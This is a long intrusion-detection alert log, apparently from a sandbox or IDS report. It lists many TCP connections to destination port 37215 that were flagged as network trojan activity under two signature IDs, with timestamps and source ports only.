                Timestamp:05/29/24-15:15:22.657717
                SID:2829579
                Source Port:60588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855991
                SID:2835222
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519731
                SID:2835222
                Source Port:58428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714434
                SID:2835222
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827279
                SID:2829579
                Source Port:49586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721047
                SID:2829579
                Source Port:52978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609799
                SID:2829579
                Source Port:41254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227090
                SID:2835222
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834527
                SID:2829579
                Source Port:36726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820998
                SID:2829579
                Source Port:48600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587491
                SID:2829579
                Source Port:43086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818259
                SID:2829579
                Source Port:46116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226994
                SID:2829579
                Source Port:43426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418796
                SID:2829579
                Source Port:45830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784335
                SID:2835222
                Source Port:39022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877821
                SID:2829579
                Source Port:35482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988705
                SID:2835222
                Source Port:54392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795357
                SID:2835222
                Source Port:43370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394634
                SID:2829579
                Source Port:41942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968804
                SID:2835222
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574643
                SID:2829579
                Source Port:41104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673491
                SID:2829579
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218253
                SID:2829579
                Source Port:36248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317289
                SID:2829579
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025550
                SID:2835222
                Source Port:39786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286314
                SID:2835222
                Source Port:45542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781236
                SID:2829579
                Source Port:42448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.043330
                SID:2829579
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417162
                SID:2829579
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946353
                SID:2835222
                Source Port:42414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873525
                SID:2835222
                Source Port:35584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732444
                SID:2829579
                Source Port:52148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325431
                SID:2829579
                Source Port:60226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168828
                SID:2835222
                Source Port:36702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871728
                SID:2829579
                Source Port:40452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261558
                SID:2829579
                Source Port:57380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666739
                SID:2835222
                Source Port:57896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264825
                SID:2835222
                Source Port:42922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638947
                SID:2835222
                Source Port:35898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475193
                SID:2835222
                Source Port:35596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898314
                SID:2835222
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811474
                SID:2835222
                Source Port:60176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134717
                SID:2829579
                Source Port:51272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617603
                SID:2829579
                Source Port:38652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111255
                SID:2829579
                Source Port:59046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.336022
                SID:2835222
                Source Port:47764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794564
                SID:2829579
                Source Port:40252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928121
                SID:2829579
                Source Port:53290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335999
                SID:2829579
                Source Port:37450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180648
                SID:2829579
                Source Port:56760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868196
                SID:2829579
                Source Port:50652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860480
                SID:2835222
                Source Port:41506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257315
                SID:2835222
                Source Port:46900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893738
                SID:2835222
                Source Port:37368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597226
                SID:2835222
                Source Port:52688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262141
                SID:2829579
                Source Port:54160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914993
                SID:2835222
                Source Port:56172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610319
                SID:2829579
                Source Port:42508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231023
                SID:2835222
                Source Port:50946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381681
                SID:2835222
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675254
                SID:2829579
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394838
                SID:2829579
                Source Port:59702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854454
                SID:2835222
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510182
                SID:2829579
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834723
                SID:2829579
                Source Port:60594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035304
                SID:2835222
                Source Port:58818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446694
                SID:2829579
                Source Port:34930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840340
                SID:2829579
                Source Port:58766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.985515
                SID:2829579
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435816
                SID:2829579
                Source Port:36994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441035
                SID:2829579
                Source Port:49998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782685
                SID:2829579
                Source Port:34836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175410
                SID:2829579
                Source Port:51598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791536
                SID:2829579
                Source Port:33900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982478
                SID:2829579
                Source Port:49710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667822
                SID:2829579
                Source Port:39532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731137
                SID:2835222
                Source Port:47112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014685
                SID:2829579
                Source Port:52876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181443
                SID:2835222
                Source Port:54218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180518
                SID:2835222
                Source Port:56988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.632084
                SID:2829579
                Source Port:60324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266418
                SID:2835222
                Source Port:38774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989832
                SID:2829579
                Source Port:45612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967325
                SID:2829579
                Source Port:41400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584578
                SID:2835222
                Source Port:57382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271727
                SID:2835222
                Source Port:56990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959682
                SID:2829579
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836530
                SID:2829579
                Source Port:43500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832938
                SID:2829579
                Source Port:59360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596749
                SID:2829579
                Source Port:57080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223430
                SID:2829579
                Source Port:36536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421839
                SID:2829579
                Source Port:34692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950244
                SID:2829579
                Source Port:44900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884060
                SID:2835222
                Source Port:53018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824196
                SID:2829579
                Source Port:60588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226522
                SID:2829579
                Source Port:49316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784911
                SID:2835222
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644978
                SID:2835222
                Source Port:44952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645106
                SID:2835222
                Source Port:44492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928593
                SID:2829579
                Source Port:50358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896984
                SID:2835222
                Source Port:43856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616359
                SID:2829579
                Source Port:49954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931743
                SID:2835222
                Source Port:58538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321117
                SID:2835222
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873483
                SID:2835222
                Source Port:58524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166301
                SID:2835222
                Source Port:50244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.981107
                SID:2829579
                Source Port:54828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811929
                SID:2829579
                Source Port:57372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651671
                SID:2829579
                Source Port:39692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726252
                SID:2829579
                Source Port:43514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241412
                SID:2829579
                Source Port:51948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873540
                SID:2829579
                Source Port:36604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030984
                SID:2829579
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558227
                SID:2835222
                Source Port:50062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877906
                SID:2835222
                Source Port:50900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279436
                SID:2829579
                Source Port:50742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022435
                SID:2829579
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520320
                SID:2829579
                Source Port:43346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969888
                SID:2835222
                Source Port:40034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834630
                SID:2835222
                Source Port:47900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438290
                SID:2835222
                Source Port:33776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227723
                SID:2829579
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631783
                SID:2835222
                Source Port:60190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218060
                SID:2829579
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701594
                SID:2829579
                Source Port:40526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264781
                SID:2829579
                Source Port:34834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329105
                SID:2829579
                Source Port:44730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.220775
                SID:2829579
                Source Port:37776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328545
                SID:2835222
                Source Port:56872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129254
                SID:2829579
                Source Port:34094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134482
                SID:2829579
                Source Port:38390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381286
                SID:2835222
                Source Port:44054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617584
                SID:2835222
                Source Port:58086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505309
                SID:2829579
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868915
                SID:2835222
                Source Port:48664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429355
                SID:2829579
                Source Port:50056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520515
                SID:2829579
                Source Port:46442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612840
                SID:2829579
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731464
                SID:2835222
                Source Port:60438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289236
                SID:2835222
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653642
                SID:2829579
                Source Port:58120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908717
                SID:2829579
                Source Port:45722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023192
                SID:2829579
                Source Port:35142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441377
                SID:2829579
                Source Port:38384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178775
                SID:2835222
                Source Port:59654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468805
                SID:2835222
                Source Port:47786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927865
                SID:2835222
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418103
                SID:2829579
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225662
                SID:2835222
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.704955
                SID:2835222
                Source Port:46772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881678
                SID:2835222
                Source Port:46672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997458
                SID:2835222
                Source Port:58360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813170
                SID:2829579
                Source Port:37314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465958
                SID:2829579
                Source Port:57430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369548
                SID:2835222
                Source Port:53146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852245
                SID:2835222
                Source Port:59582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062676
                SID:2829579
                Source Port:53350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654192
                SID:2835222
                Source Port:37406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617480
                SID:2835222
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846524
                SID:2835222
                Source Port:47574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467287
                SID:2835222
                Source Port:41072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877233
                SID:2829579
                Source Port:56582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524415
                SID:2835222
                Source Port:57382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955908
                SID:2829579
                Source Port:51538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899184
                SID:2835222
                Source Port:36592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897294
                SID:2829579
                Source Port:38398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903952
                SID:2829579
                Source Port:36666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.888946
                SID:2829579
                Source Port:36630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890091
                SID:2835222
                Source Port:49410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900688
                SID:2829579
                Source Port:40268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727035
                SID:2829579
                Source Port:49838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335141
                SID:2835222
                Source Port:53770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135915
                SID:2829579
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736850
                SID:2829579
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453570
                SID:2829579
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372288
                SID:2829579
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510982
                SID:2835222
                Source Port:49406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685705
                SID:2835222
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369730
                SID:2835222
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843785
                SID:2835222
                Source Port:49526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564822
                SID:2829579
                Source Port:49258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286617
                SID:2835222
                Source Port:59126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949666
                SID:2829579
                Source Port:58668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141314
                SID:2829579
                Source Port:52440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767486
                SID:2829579
                Source Port:54024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809670
                SID:2829579
                Source Port:34404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897063
                SID:2835222
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890066
                SID:2829579
                Source Port:51632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468434
                SID:2835222
                Source Port:45616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728568
                SID:2829579
                Source Port:39718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628754
                SID:2835222
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813360
                SID:2835222
                Source Port:41362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872915
                SID:2829579
                Source Port:44854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285657
                SID:2829579
                Source Port:36852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434804
                SID:2835222
                Source Port:47314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804957
                SID:2829579
                Source Port:34594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015038
                SID:2829579
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626718
